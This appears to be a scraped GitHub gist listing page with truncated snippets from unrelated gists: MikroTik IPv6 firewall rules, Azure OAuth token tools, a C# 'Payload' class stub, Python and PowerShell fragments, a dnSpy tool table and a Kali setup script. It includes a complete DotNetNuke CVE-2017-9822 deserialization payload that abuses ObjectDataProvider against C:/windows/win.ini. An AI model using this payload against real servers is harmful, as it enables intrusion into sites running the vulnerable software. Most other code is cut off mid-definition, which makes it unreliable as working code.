Skip to content

Instantly share code, notes, and snippets.

# https://mum.mikrotik.com/presentations/EU17/presentation_4088_1492591370.pdf
# http://tools.ietf.org/html/rfc792
/ipv6 firewall filter
add action=accept chain=input comment="Accept Established and Related Connections" connection-state=established,related
add action=accept chain=input comment="Accept Connections from IPv6 administrative addresses" src-address-list="Administrative IPv6 Adressess“
add action=accept chain=input comment="Accept DHCPv6 (UDP ports 547->546)" dst-port=546 protocol=udp src-port=547
add action=accept chain=input comment="Accept DHCPv6 (TCP ports 547->546)" dst-port=546 protocol=tcp src-port=547
add action=jump chain=input comment="Jump to ICMPv6 Control" connection-state="" jump-target=ICMPv6_Control
add action=drop chain=input comment="Drop all the rest"
@DrMeosch
DrMeosch / AzureOAuthTools.ps1
Created June 25, 2020 18:57 — forked from dafthack/AzureOAuthTools.ps1
A few PowerShell tools for working with Azure OAuth2 Authentication Codes and Access Tokens
## A few tools for working with Azure OAuth2 Authentication Codes and access_tokens
## By Beau Bullock @dafthack
Function Get-AzureAccessToken{
Param
(
[Parameter(Position = 0, Mandatory = $false)]
[string]
using System;
using System.IO;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Net;
using System.IO.Compression;
public class Payload
{
#!/usr/bin/env python3.7
# *-* coding: utf-8 *-*
from requests.exceptions import HTTPError, Timeout
from urllib.parse import quote, quote_plus
from time import perf_counter
from cmd import Cmd
import requests
import sys
import re
#!/usr/bin/env python3.7
# *-* coding: utf-8 *-*
from requests.exceptions import HTTPError, Timeout
from urllib.parse import quote, quote_plus
from time import perf_counter
from cmd import Cmd
import requests
import sys
import re
# You Should be able to Copy and Paste this into a powershell terminal and it should just work.
# To end the loop you have to kill the powershell terminal. ctrl-c wont work :/
# Http Server
$http = [System.Net.HttpListener]::new()
# Hostname and port to listen on
# PS> netsh http add urlacl url="http://+:4200/" user=everyone
python smtp oneliner

Turning a release build into a debug build

Requirements

Type Name Developer Price License Download Website
Decompiler/IL Editor dnSpy 0xd4d Open source GPL v3 https://ci.appveyor.com/project/0xd4d/dnspy/branch/master/artifacts GitHub
Decompiler dotPeek JetBrains Free Commercial https://www.jetbrains.com/decompiler/download/ Official Website
Deobfuscator de4dot 0xd4d Open source GPL v3 https://ci.appveyor.com/project/0xd4d/de4dot/branch/master/artifacts GitHub
@DrMeosch
DrMeosch / ReadFile.xml
Created October 5, 2019 22:01 — forked from pwntester/ReadFile.xml
DotNetNuke (CVE-2017-9822) Payloads
<profile><item key="name1:key1" type="System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ExpandedElement/><ProjectedProperty0><MethodName>WriteFile</MethodName><MethodParameters><anyType xsi:type="xsd:string">C:/windows/win.ini</anyType></MethodParameters><ObjectInstance xsi:type="FileSystemUtils"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>
#!/bin/bash
export DEBIAN_FRONTEND=noninteractive;
echo "[*] Starting Install... [*]"
echo "[*] Upgrade installed packages to latest [*]"
echo -e "\nRunning a package upgrade...\n"
apt-get -qq update && apt-get -qq dist-upgrade -y
apt full-upgrade -y
apt-get autoclean
echo "[*] Install stuff I use all the time [*]"